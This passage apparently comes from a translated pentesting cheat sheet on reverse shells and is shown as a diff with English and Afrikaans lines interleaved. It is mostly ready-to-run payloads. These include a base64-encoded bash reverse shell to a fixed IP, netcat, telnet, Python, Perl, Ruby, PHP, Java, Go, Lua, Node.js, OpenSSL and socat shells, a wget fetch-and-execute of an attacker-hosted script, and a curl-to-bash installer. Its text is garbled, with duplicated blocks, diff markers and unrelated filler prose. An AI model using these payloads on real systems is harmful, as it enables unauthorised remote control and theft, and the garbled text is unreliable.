echo bm9odXAgYmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjQuMTg1LzQ0NDQgMD4mMScK | base64 -d | bash 2>/dev/null
```
#### Skulverduideliking
#### Shell explanation
1. **`bash -i`**: This part of the command starts an interactive (`-i`) Bash shell.
2. **`>&`**: This part of the command is a shorthand notation for **redirecting both standard output** (`stdout`) and **standard error** (`stderr`) to the **same destination**.
3. **`/dev/tcp/<ATTACKER-IP>/<PORT>`**: This is a special file that **represents a TCP connection to the specified IP address and port**.
* By **redirecting the output and error streams to this file**, the command effectively sends the output of the interactive shell session to the attacker's machine.
4. **`0>&1`**: This part of the command **redirects standard input (`stdin`) to the same destination as standard output (`stdout`)**.
### Create in file and execute
1. **`bash -i`**: Hierdie deel van die bevel begin 'n interaktiewe (`-i`) Bash-skyf.
2. **`>&`**: Hierdie deel van die bevel is 'n kort notasie vir die **omleiding van beide standaarduitvoer** (`stdout`) en **standaardfout** (`stderr`) na dieselfde bestemming.
3. **`/dev/tcp/<AANVALLER-IP>/<POORT>`**: Dit is 'n spesiale lêer wat 'n TCP-verbinding na die gespesifiseerde IP-adres en poort **voorstel**.
* Deur die uitvoer- en foutstrome na hierdie lêer te **omlei**, stuur die bevel die uitset van die interaktiewe skyfsessie effektief na die aanvaller se masjien.
4. **`0>&1`**: Hierdie deel van die bevel **omlei standaardinskrywing (`stdin`) na dieselfde bestemming as standaarduitvoer (`stdout`)**.
### Skep in lêer en voer uit
```bash
echo -e '#!/bin/bash\nbash -i >& /dev/tcp/1<ATTACKER-IP>/<PORT> 0>&1' > /tmp/sh.sh; bash /tmp/sh.sh;
wget http://<IP attacker>/shell.sh -P /tmp; chmod +x /tmp/shell.sh; /tmp/shell.sh
```
## Voorwaartse Skulp
## Forward Shell
As jy 'n **RCE kwesbaarheid** binne 'n Linux-gebaseerde webtoepassing teëkom, kan daar gevalle wees waar **dit moeilik word om 'n omgekeerde skulp te verkry** as gevolg van die teenwoordigheid van Iptables-reëls of ander filters. In sulke scenario's, oorweeg om 'n PTY-skulp binne die gekompromitteerde stelsel te skep deur gebruik te maak van pype.
If you encounter an **RCE vulnerability** within a Linux-based web application, there might be instances where **obtaining a reverse shell becomes difficult** due to the presence of Iptables rules or other filters. In such scenarios, consider creating a PTY shell within the compromised system using pipes.
Jy kan die kode vind op [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell)
You can find the code in [**https://github.com/IppSec/forward-shell**](https://github.com/IppSec/forward-shell)
Jy hoef net te wysig:
You just need to modify:
* Die URL van die kwesbare gasheer
* Die voorvoegsel en agtervoegsel van jou payload (indien enige)
* Die manier waarop die payload gestuur word (koppe? data? ekstra inligting?)
* The URL of the vulnerable host
* The prefix and suffix of your payload (if any)
* The way the payload is sent (headers? data? extra info?)
Then, you can just **send commands** or even **use the `upgrade` command** to get a full PTY (note that pipes are read and written with an approximate 1.3s delay).
Daarna kan jy net **opdragte stuur** of selfs die `upgrade`-opdrag gebruik om 'n volledige PTY te kry (let daarop dat pype gelees en geskryf word met 'n benaderde vertraging van 1.3s).
## Netcat
```bash
nc -e /bin/sh <ATTACKER-IP> <PORT>
nc <ATTACKER-IP> <PORT> | /bin/sh #Blind
@ -94,66 +87,189 @@ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER-IP> <PORT> >/tmp
nc <ATTACKER-IP> <PORT1>| /bin/bash | nc <ATTACKER-IP> <PORT2>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | nc <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
```
## gsocket
Check it in [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/)
Kyk dit na by [https://www.gsocket.io/deploy/](https://www.gsocket.io/deploy/)
```bash
bash -c "$(curl -fsSL gsocket.io/x)"
```
## Telnet
Telnet is 'n protokol wat gebruik word om 'n verbinding met 'n bediener te maak en op afstand te kommunikeer. Dit maak gebruik van 'n onversleutelde verbinding, wat beteken dat die inligting wat oorgedra word, nie geïnkodeer word nie en dus vatbaar is vir afluistering. Telnet word dikwels gebruik om toegang tot 'n bediener se opdraglyn te verkry en opdragte uit te voer.
### Telnet-aanvalle
Telnet-aanvalle is 'n metode wat deur aanvallers gebruik word om toegang tot 'n bediener te verkry deur die gebruik van swak of gesteelde legitimasie-inligting. Hierdie aanvalle kan gebruik word om ongemagtigde toegang tot 'n bediener te verkry en potensieel skadelike opdragte uit te voer.
### Mitigasie
Om Telnet-aanvalle te voorkom, moet die volgende stappe geneem word:
- Telnet moet gedeaktiveer word as dit nie nodig is nie.
- As Telnet wel nodig is, moet dit slegs toeganklik wees via 'n veilige, versleutelde verbinding.
- Sterk legitimasiebeleid moet geïmplementeer word om te verseker dat slegs geakkrediteerde gebruikers toegang tot die Telnet-diens het.
- Die gebruik van sterk, unieke wagwoorde moet afgedwing word om die risiko van gesteelde legitimasie-inligting te verminder.
### Voorbeeld
```bash
telnet 192.168.0.1
```
In hierdie voorbeeld maak die gebruiker 'n Telnet-verbinding met die IP-adres 192.168.0.1.
```bash
telnet <ATTACKER-IP> <PORT> | /bin/sh #Blind
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|telnet <ATTACKER-IP> <PORT> >/tmp/f
telnet <ATTACKER-IP> <PORT> | /bin/bash | telnet <ATTACKER-IP> <PORT>
rm -f /tmp/bkpipe;mknod /tmp/bkpipe p;/bin/sh 0</tmp/bkpipe | telnet <ATTACKER-IP> <PORT> 1>/tmp/bkpipe
```
## Wie is
## Whois
**Attacker**
**Aanvaller**
```bash
while true; do nc -l <port>; done
```
Om die bevel te stuur, skryf dit neer, druk enter en druk CTRL+D (om STDIN te stop)
To send the command write it down, press enter and press CTRL+D (to stop STDIN)
**Victim**
**Slagoffer**
```bash
export X=Connected; while true; do X=`eval $(whois -h <IP> -p <Port> "Output: $X")`; sleep 1; done
```
## Python
Python is 'n baie gewilde programmeertaal wat algemeen gebruik word in die hacking-gemeenskap. Dit is 'n hoëvlaktaal met 'n eenvoudige sintaksis, wat dit maklik maak om te leer en te gebruik. Python bied 'n wye verskeidenheid biblioteke en modules wat spesifiek ontwerp is vir hacking en pentesting.
### Python-installasie
Om Python op Linux te installeer, kan jy die volgende opdrag gebruik:
```bash
sudo apt-get install python
```
### Python-skripsies uitvoer
Om 'n Python-skripsie uit te voer, gebruik die volgende sintaksis:
```bash
python skripsie.py
```
### Python-interaktiewe modus
Python bied 'n interaktiewe modus wat gebruik kan word om Python-kode regstreeks in die opdragreël uit te voer. Om die interaktiewe modus te begin, tik eenvoudig `python` in die opdragreël.
### Python-biblioteke vir hacking
Daar is 'n verskeidenheid Python-biblioteke wat nuttig kan wees vir hacking en pentesting. Hier is 'n paar voorbeelde:
- **Scapy**: 'n kragtige en veelsydige biblioteek vir netwerkpakketmanipulasie.
- **Requests**: 'n eenvoudige en maklik om te gebruik biblioteek vir HTTP-aanvrae.
- **BeautifulSoup**: 'n biblioteek vir die skraping van webinhoud.
- **Paramiko**: 'n SSH-implementering vir Python.
- **Pycrypto**: 'n biblioteek vir kriptografie-operasies.
- **Selenium**: 'n biblioteek vir outomatiese webblaaierinteraksie.
### Python-bronne
As jy meer wil leer oor Python en hoe dit gebruik kan word vir hacking, is hier 'n paar nuttige bronne:
- [Python.org](https://www.python.org/): Die amptelike webwerf van Python, met dokumentasie en tutoriale.
- [Hacking with Python](https://www.hackingwithpython.com/): 'n Gratis aanlynbron met praktiese hacking-projekte en tutoriale.
- [Black Hat Python](https://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900): 'n Boek deur Justin Seitz wat Python-programmering toepas op hacking-scenarios.
Python is 'n kragtige en veelsydige taal wat 'n waardevolle hulpmiddel kan wees vir enige hacker of pentester. Deur Python te leer en te gebruik, kan jy jou vaardighede in die hacking-wêreld verbeter en meer doeltreffend word in jou pogings.
```bash
#Linux
export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
#IPv6
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
```
## Perl
Perl is 'n kragtige skriptaal wat algemeen gebruik word in die wêreld van hacking. Dit bied 'n verskeidenheid funksies en modules wat dit 'n gewilde keuse maak vir die uitvoer van verskillende hacking-take.
### Uitvoer van Perl-skrips
Om 'n Perl-skrip uit te voer, gebruik die volgende sintaks:
```bash
perl skrip.pl
```
### Basiese sintaks
Hier is 'n paar basiese sintaksreëls vir Perl:
- Kommentaar: `# Hierdie is 'n kommentaar`
- Veranderlike toekenning: `$naam = waarde;`
- Druk na die skerm: `print "Boodskap";`
- Invoer vanaf die gebruiker: `$invoer = <STDIN>;`
### Belangrike funksies en modules
Perl het 'n ryk versameling funksies en modules wat nuttig kan wees vir hacking. Hier is 'n paar belangrike een:
- `system()`: Hierdie funksie voer 'n stelseloproepe uit en kan gebruik word om eksterne opdragte uit te voer.
- `open()`: Hierdie funksie maak 'n lêer oop vir lees- of skryftoegang.
- `close()`: Hierdie funksie sluit 'n oop lêer.
- `chdir()`: Hierdie funksie verander die huidige werkspasie.
- `unlink()`: Hierdie funksie verwyder 'n lêer van die lêersisteem.
### Voorbeeld van 'n Perl-skrip
Hier is 'n voorbeeld van 'n eenvoudige Perl-skrip wat die huidige datum en tyd druk:
```perl
#!/usr/bin/perl
use strict;
use warnings;
my $datum_tyd = `date`;
print "Die huidige datum en tyd is: $datum_tyd";
```
Hierdie skrip gebruik die `date`-opdrag om die huidige datum en tyd te kry en druk dit dan na die skerm.
### Slotwoord
Perl is 'n kragtige skriptaal wat 'n verskeidenheid hacking-take kan uitvoer. Deur die gebruik van die regte funksies en modules, kan jy doeltreffend en doelgerig te werk gaan in jou hacking-projekte.
```bash
perl -e 'use Socket;$i="<ATTACKER-IP>";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
```
## Ruby
Ruby is 'n dinamiese, objek-georiënteerde programmeertaal wat algemeen gebruik word vir webontwikkeling en skripskryf. Dit het 'n eenvoudige sintaksis en is maklik om te leer en te gebruik. Hier is 'n paar belangrike punte oor Ruby:
- **Interaktiewe omgewing**: Ruby het 'n interaktiewe omgewing, bekend as 'n IRB (Interactive Ruby), waar jy kode kan skryf en dit onmiddellik kan uitvoer om resultate te sien.
- **Objek-georiënteerd**: Ruby is 'n volledig objek-georiënteerde programmeertaal, wat beteken dat alles in Ruby 'n objek is. Dit maak gebruik van klasse en objek om funksionaliteit te organiseer en te struktureer.
- **Dinamies**: Ruby is 'n dinamiese programmeertaal, wat beteken dat jy veranderlikes kan skep en hulle kan toewys sonder om hulle tipes vooraf te spesifiseer. Dit maak dit maklik om kode te skryf en te verander sonder om jouself te bekommer oor tipes nie.
- **Gemeenskap**: Ruby het 'n aktiewe en ondersteunende gemeenskap van ontwikkelaars regoor die wêreld. Daar is baie bronne, tutoriale en biblioteke beskikbaar om jou te help om met Ruby te werk.
- **Rails**: Ruby on Rails is 'n gewilde webraamwerk wat gebou is op Ruby. Dit bied 'n gestandaardiseerde manier om webtoepassings te bou en maak gebruik van die krag van Ruby se objek-georiënteerde model.
As jy belangstel om Ruby te leer, kan jy begin deur die dokumentasie en tutoriale op die amptelike Ruby-webwerf te bestudeer. Daar is ook baie boeke en aanlynbronne beskikbaar wat jou kan help om die taal te leer en te bemeester.
```bash
ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
```
## PHP
PHP is 'n skripsie-taal wat algemeen gebruik word vir die ontwikkeling van webtoepassings. Dit word meestal geïnterpreteer deur 'n webbediener wat die uitvoering van PHP-kode moontlik maak. Hier is 'n paar belangrike punte om in gedagte te hou wanneer dit kom by PHP:
- **Ingeslote kode**: PHP-kode word gewoonlik ingesluit in HTML-dokumente deur gebruik te maak van die `<?php` en `?>` etikette. Hierdie kode word uitgevoer deur die webbediener voordat die HTML na die kliënt gestuur word.
- **Dinamiese inhoud**: PHP maak dit moontlik om dinamiese inhoud op 'n webwerf te skep deur die gebruik van veranderlikes, lusse, voorwaardelike verklarings en funksies.
- **Databasisinteraksie**: PHP kan gebruik word om te kommunikeer met 'n databasis deur middel van verskillende databasisverbindingsbiblioteke soos MySQLi en PDO.
- **Veiligheidsoorwegings**: Dit is belangrik om sekuriteitsmaatreëls in ag te neem wanneer jy PHP-kode skryf om te verseker dat jou webtoepassing nie kwesbaar is vir aanvalle soos SQL-injeksie of kruisskripsaanvalle nie.
- **Foutafhandeling**: PHP bied verskillende metodes om foute af te handel, insluitend die gebruik van uitsonderings en foutkodes.
PHP bied 'n kragtige en veelsydige raamwerk vir die ontwikkeling van webtoepassings. Dit is belangrik om 'n goeie begrip van die taal te hê en om bewus te wees van die beste praktyke vir die skryf van veilige en doeltreffende PHP-kode.
```php
// Using 'exec' is the most common method, but assumes that the file descriptor will be 3.
// Using this method may lead to instances where the connection reaches out to the listener and then closes.
@ -165,59 +281,244 @@ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php exec("/bin/bash -c 'bash -i >/dev/tcp/10.10.14.8/4444 0>&1'"); ?>
```
## Java
Java is 'n populaire programmeertaal wat gebruik word vir die ontwikkeling van verskeie toepassings, insluitend webtoepassings, mobiele toepassings en bedryfsagteware. Dit is 'n objekgeoriënteerde taal wat bekendheid geniet vir sy veiligheid, betroubaarheid en draagbaarheid.
### Voordeligheid van Java vir hackers
Java bied 'n paar voordelige eienskappe vir hackers:
- **Platformonafhanklikheid**: Java-kode kan uitgevoer word op verskillende bedryfstelsels, soos Windows, Linux en macOS, sonder om dit te hoef herskryf. Dit maak dit makliker vir hackers om hul gereedskap en aanvalskode op verskillende doelwitte te gebruik.
- **Groot gemeenskap**: Java het 'n groot gemeenskap van ontwikkelaars en ondersteuners wat gereed is om hulp te bied en kennis te deel. Hierdie gemeenskap bied 'n ryk bron van inligting, hulpmiddels en biblioteke wat hackers kan gebruik om hul vaardighede te verbeter en aanvalskode te ontwikkel.
- **Veiligheidsmaatreëls**: Java het ingeboude veiligheidsmaatreëls wat die uitvoering van skadelike kodes beperk. Hierdie maatreëls sluit in 'n streng toegangsbeheerstelsel, geheuebestuur en 'n sandboksomgewing vir die uitvoering van onbekende kodes. Alhoewel dit 'n uitdaging kan wees vir hackers om hierdie maatreëls te omseil, kan dit ook 'n geleentheid bied om kreatiewe maniere te vind om dit te doen.
### Java-hackingtegnieke
Java bied 'n verskeidenheid hackingtegnieke wat hackers kan gebruik om toegang te verkry tot stelsels, data te ontgin en aanvalle uit te voer. Hier is 'n paar voorbeelde van sulke tegnieke:
- **Java Remote Method Invocation (RMI)**: Hierdie tegniek maak dit moontlik vir 'n hacker om kode uit te voer op 'n afgeleë Java-stelsel deur gebruik te maak van die RMI-meganisme. Dit kan gebruik word om toegang te verkry tot gevoelige data of om skadelike kodes op die doelwitstelsel uit te voer.
- **Java Applet-aanvalle**: Java-applets is klein programme wat in 'n webblaaier uitgevoer kan word. Hackers kan kwaadwillige applets ontwikkel wat gebruik maak van swakplekke in die Java-beveiliging om toegang te verkry tot die stelsel van die gebruiker en skadelike aksies uit te voer.
- **Java Deserialisering-aanvalle**: Hierdie aanvaltegniek maak gebruik van swakplekke in die deserialiseringproses van Java-objekte om skadelike kodes uit te voer. Deur 'n kwaadwillige objek te skep en dit na 'n kwesbare toepassing te stuur, kan 'n hacker die uitvoering van skadelike kodes op die doelwitstelsel veroorsaak.
- **Java-beveiligingslekke**: Soos enige ander programmeertaal, het Java ook sy deel van beveiligingslekke. Hackers kan hierdie lekke uitbuit om toegang te verkry tot stelsels, data te ontgin of aanvalle uit te voer. Dit sluit in swakplekke in die Java-virtuele masjien, biblioteke en frameworks wat deur Java-toepassings gebruik word.
### Hulpmiddels vir Java-hacking
Daar is 'n verskeidenheid hulpmiddels beskikbaar vir hackers wat Java-hackingtegnieke wil toepas. Hier is 'n paar voorbeelde van sulke hulpmiddels:
- **Metasploit**: Metasploit is 'n kragtige raamwerk vir die ontwikkeling en uitvoering van aanvalskode. Dit bied 'n verskeidenheid modules en hulpmiddels wat spesifiek ontwerp is vir Java-hacking.
- **Java Decompilers**: Java Decompilers is hulpmiddels wat gebruik word om Java-kode te ontleed en te analiseer. Dit kan nuttig wees vir hackers om die werking van Java-toepassings te verstaan en swakplekke te identifiseer.
- **Burp Suite**: Burp Suite is 'n uitgebreide hulpmiddelstel vir webtoepassingtoetsing en -hacking. Dit bied 'n reeks modules en funksies wat spesifiek ontwerp is vir die identifisering en uitbuiting van swakplekke in Java-webtoepassings.
- **Java Security Manager**: Java Security Manager is 'n ingeboude hulpmiddel wat gebruik kan word om die toegang tot hulpbronne en funksies in Java-toepassings te beperk. Dit kan nuttig wees vir hackers om beperkings te omseil en toegang te verkry tot verbode hulpbronne.
### Slotwoord
Java bied 'n wye verskeidenheid hackingtegnieke en hulpmiddels vir hackers om toegang te verkry tot stelsels, data te ontgin en aanvalle uit te voer. Dit is belangrik vir hackers om 'n diepgaande begrip van die Java-programmeertaal en die veiligheidsmaatreëls daarvan te hê om suksesvolle aanvalle uit te voer.
```bash
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
```
## Ncat
Ncat is a powerful networking utility that is included in the Nmap suite. It is designed to be a flexible and reliable tool for network exploration and security auditing. Ncat can be used to create and manage network connections, perform port scanning, and transfer files between systems.
### Basic Usage
To establish a basic TCP connection using Ncat, you can use the following command:
```
ncat <target_ip> <port>
```
Replace `<target_ip>` with the IP address of the target system and `<port>` with the desired port number.
### Port Scanning
Ncat can also be used for port scanning. To scan a range of ports on a target system, you can use the following command:
```
ncat -v -z <target_ip> <start_port>-<end_port>
```
Replace `<target_ip>` with the IP address of the target system, `<start_port>` with the starting port number, and `<end_port>` with the ending port number.
### File Transfer
Ncat supports file transfer between systems. To send a file from the local system to a remote system, you can use the following command:
```
ncat -l <port> < file_to_send
```
Replace `<port>` with the desired port number and `file_to_send` with the name of the file you want to send.
To receive a file on the local system, you can use the following command on the remote system:
```
ncat <local_ip> <port> > file_to_receive
```
Replace `<local_ip>` with the IP address of the local system, `<port>` with the desired port number, and `file_to_receive` with the name you want to give to the received file.
### Conclusion
Ncat is a versatile tool that can be used for various networking tasks, including establishing network connections, performing port scanning, and transferring files between systems. Its flexibility and reliability make it a valuable asset for network exploration and security auditing.
```bash
victim> ncat --exec cmd.exe --allow 10.0.0.4 -vnl 4444 --ssl
attacker> ncat -v 10.0.0.22 4444 --ssl
```
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
Find vulnerabilities that matter most so you can fix them faster. Intruder tracks your attack surface, runs proactive threat scans, finds issues across your whole tech stack, from APIs to web apps and cloud systems. [**Try it for free**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) today.
Vind kwesbaarhede wat die belangrikste is sodat jy dit vinniger kan regmaak. Intruder volg jou aanvalsoppervlak, voer proaktiewe dreigingsskanderings uit, vind probleme regoor jou hele tegnologie-stapel, van API's tot webtoepassings en wolkstelsels. [**Probeer dit vandag gratis**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks).
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
***
## Golang
```bash
echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","192.168.0.134:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go
```
## Lua
Lua is 'n kragtige, vinnige en ligte skriptaal wat dikwels gebruik word vir die ontwikkeling van spelletjies, webtoepassings en ander sagteware. Dit bied 'n eenvoudige sintaksis en 'n klein geheue-afdruk, wat dit 'n gewilde keuse maak vir verskeie toepassings.
### Lua Skelms
#### Lua Skelms deur die opstel van 'n skadelike kode
Om 'n Lua-skelm te skep, kan jy skadelike kode in 'n Lua-skripsie insluit. Wanneer die skripsie uitgevoer word, sal die skadelike kode ook uitgevoer word. Dit kan gebruik word om verskeie aanvalle uit te voer, soos die uitvoering van skadelike instruksies, die verkryging van toegang tot die stelsel, of die verspreiding van malware.
#### Lua Skelms deur die manipulasie van bestaande skripsies
'n Ander metode om 'n Lua-skelm te skep, is deur die manipulasie van bestaande Lua-skripsies. Dit kan gedoen word deur die insluiting van skadelike kode in 'n bestaande skripsie, of deur die verandering van die funksionaliteit van 'n bestaande skripsie om skadelike aksies uit te voer.
### Lua Skelms Voorkoming
Om Lua-skripsieskelms te voorkom, moet jy sekuriteitsmaatreëls implementeer soos:
- Vertrou nie onbetroubare bronne nie en verifieer die bron van die skripsie voordat dit uitgevoer word.
- Beperk die toegang tot die Lua-omgewing en beperk die funksies wat beskikbaar is vir uitvoering.
- Monitor die uitvoering van Lua-skripsies vir enige verdagte aktiwiteit.
- Verseker dat die Lua-omgewing opgedateer en gepatch is om bekende kwesbaarhede te voorkom.
### Lua Skelms Oplossings
As jy vermoed dat 'n Lua-skripsie 'n skelm bevat, kan jy die volgende stappe neem om dit op te los:
1. Verwyder die skadelike kode uit die skripsie.
2. Verifieer die bron van die skripsie en verseker dat dit betroubaar is.
3. Monitor die stelsel vir enige verdagte aktiwiteit en neem stappe om dit te beperk.
4. Verseker dat die Lua-omgewing opgedateer en gepatch is om bekende kwesbaarhede te voorkom.
Deur hierdie maatreëls te implementeer, kan jy die risiko van Lua-skripsieskelms verminder en jou stelsel veilig hou.
```bash
#Linux
lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
#Windows & Linux
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
```
## NodeJS
NodeJS is 'n open-source, platform-onafhanklike uitvoeringsomgewing wat gebruik word vir die ontwikkeling van skaalbare en vinnige netwerktoepassings. Dit is gebou op die V8 JavaScript-enjin en maak gebruik van 'n nie-blokkerende I/O-model, wat beteken dat dit effektief kan omgaan met baie gelyktydige verbindings sonder om die prestasie te beïnvloed.
### Installasie
Om NodeJS op Linux te installeer, kan jy die volgende stappe volg:
1. Voer die volgende opdrag uit om die NodeJS-pakketbron te installeer:
```
curl -sL https://deb.nodesource.com/setup_14.x | sudo -E bash -
```
2. Installeer NodeJS deur die volgende opdrag uit te voer:
```
sudo apt-get install -y nodejs
```
3. Om te bevestig dat NodeJS suksesvol geïnstalleer is, kan jy die volgende opdrag uitvoer:
```
node -v
```
### Aan die gang
Om 'n nuwe NodeJS-projek te skep, kan jy die volgende stappe volg:
1. Skep 'n nuwe leë gids vir jou projek:
```
mkdir myproject
cd myproject
```
2. Skep 'n nuwe `package.json`-lêer deur die volgende opdrag uit te voer:
```
npm init -y
```
3. Installeer enige afhanklikhede wat jy benodig vir jou projek deur die volgende opdrag uit te voer:
```
npm install <afhanklikheid>
```
4. Skep 'n nuwe JavaScript-lêer, byvoorbeeld `index.js`, en skryf jou NodeJS-kode daarin.
5. Voer jou NodeJS-program uit deur die volgende opdrag uit te voer:
```
node index.js
```
### Belangrike NodeJS-konsepte
Hier is 'n paar belangrike konsepte in NodeJS wat jy moet verstaan:
- **Modules**: NodeJS maak gebruik van modules om funksionaliteit te organiseer en te hergebruik. Jy kan modules invoer deur die `require`-funksie te gebruik.
- **Asynchrone programmering**: NodeJS maak gebruik van asynchrone programmering om nie-blokkerende I/O te bereik. Dit beteken dat jy funksies kan uitvoer sonder om te wag vir 'n antwoord, wat die algehele prestasie verbeter.
- **Evenementgedrewe programmering**: NodeJS is gebaseer op 'n evenementgedrewe model, waarin funksies uitgevoer word as reaksie op spesifieke gebeure. Jy kan luisteraars aanheg aan gebeure en funksies uitvoer wanneer die gebeurtenis plaasvind.
- **NPM**: NPM (Node Package Manager) is die standaard pakketsisteem vir NodeJS. Dit stel jou in staat om afhanklikhede te bestuur en te deel met ander ontwikkelaars.
- **Express**: Express is 'n gewilde webraamwerk vir NodeJS wat dit maklik maak om webtoepassings te bou. Dit bied 'n eenvoudige en elegante sintaksis vir die hantering van roetes, middelware en sjablone.
### Nuttige hulpbronne
Hier is 'n paar nuttige hulpbronne vir die leer en verbetering van jou NodeJS-vaardighede:
- [NodeJS-dokumentasie](https://nodejs.org/en/docs/)
- [NPM-dokumentasie](https://docs.npmjs.com/)
- [Express-dokumentasie](https://expressjs.com/)
- [NodeJS-tutoriale](https://www.tutorialspoint.com/nodejs/index.htm)
- [NodeJS-kursusse op Udemy](https://www.udemy.com/topic/nodejs/)
```javascript
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "10.17.26.64", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(8080, "10.17.26.64", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();
@ -248,19 +549,15 @@ or
https://gitlab.com/0x4ndr3/blog/blob/master/JSgen/JSgen.py
```
## OpenSSL
The Attacker (Kali)
Die Aanvaller (Kali)
```bash
openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here yo will be able to get the response
```
The Victim
Die Slagoffer
```bash
#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
@ -268,103 +565,176 @@ openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_clien
#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>
```
## **Socat**
[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)
### Bind shell
### Bind dop
'n Bind dop is 'n tipe dop wat gebruik word om 'n verbinding te skep tussen 'n aanvaller se masjien en 'n teiken masjien. Hierdie dop bind aan 'n spesifieke poort op die teiken masjien en wag vir 'n inkomende verbinding van die aanvaller. Die aanvaller kan dan gebruik maak van hierdie verbinding om beheer oor die teiken masjien te verkry.
```bash
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
```
'n Reverse shell is 'n tegniek wat gebruik word deur 'n aanvaller om toegang te verkry tot 'n teikenstelsel vanaf 'n afstand. Dit behels die gebruik van 'n kwaadwillige kode wat op die teikenstelsel uitgevoer word en 'n verbinding met die aanvaller se stelsel vestig. Hierdie verbinding stel die aanvaller in staat om op afstand opdragte uit te voer en toegang te verkry tot die teikenstelsel se hulpbronne en data.
### Reverse shell
'n Reverse shell kan op verskillende maniere geïmplementeer word, maar die algemene idee is om 'n verbinding te maak vanaf die teikenstelsel na die aanvaller se stelsel. Dit kan gedoen word deur gebruik te maak van 'n kwaadwillige program wat op die teikenstelsel uitgevoer word en 'n netwerkverbinding inisieer na die aanvaller se IP-adres en poortnommer. Die aanvaller kan dan 'n luisterende program op sy stelsel hê wat die inkomende verbinding aanvaar en 'n interaktiewe sessie met die teikenstelsel bied.
'n Reverse shell is 'n kragtige tegniek wat deur aanvallers gebruik word om toegang te verkry tot stelsels en netwerke. Dit is belangrik vir verdedigers om bewus te wees van hierdie tegniek en maatreëls te tref om dit te voorkom.
```bash
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
